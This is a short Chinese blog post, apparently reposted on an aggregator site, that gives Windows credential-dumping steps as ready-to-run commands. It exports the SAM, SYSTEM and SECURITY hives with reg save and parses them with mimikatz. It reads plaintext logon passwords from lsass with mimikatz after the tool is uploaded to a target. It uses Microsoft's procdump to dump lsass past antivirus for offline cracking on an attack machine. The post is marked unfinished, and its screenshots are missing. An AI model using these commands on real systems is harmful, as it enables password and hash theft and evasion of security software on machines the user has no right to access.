首页 > Windows开发 > 详细

Windows 获取Hash手法

时间:2021-09-16 11:50:40      阅读:26      评论:0      收藏:0      [点我收藏+]

Windows server 2008:

  【1】当sam文件被占用时,利用reg(注册表)导出文件三个文件(需要administrator权限)

  reg save HKLM\sam C:\sam.hive

  reg save HKLM\system C:\system.hive

  reg save HKLM\security C:\security.hive

技术分享图片

  再把三个文件放到mimikatz同目录下执行命令,在当前目录下会生成一个log.txt

  mimikatz.exe "lsadump::sam /sam:sam.hive /system:system.hive" "exit" > log.txt

技术分享图片

技术分享图片

 

 

  【2】从lsass进程中,读取明文密码(需要administrator权限)

    先将mimikatz.exe、mimikatz.dll、sysdig.dll 上传至目标系统,然后目录下执行如下命令

         开cmd敲命令:mimikatz.exe "privilege::debug" "sekurlsa::logonPasswords full" "exit" >hash.txt
技术分享图片技术分享图片

 

 

  【3】如果存在杀软,则利用Procdump工具把进程对应的内存空间中的数据,转存为文件

    因为Procdump工具是微软开发的工具所以一般不会杀掉,有32和64位的!

    把工具上传至目标系统然后执行命令procdump64.exe -accepteula -ma lsass.exe lsass

技术分享图片

 

 技术分享图片

     把lsass.dmp文件下载到自己的攻击机上使用mimikatz进行抓取Hash

技术分享图片

 

 

 

 

 

 

 

未完!

 

Windows 获取Hash手法

原文:https://www.cnblogs.com/PatrickStar88888888/p/15270448.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!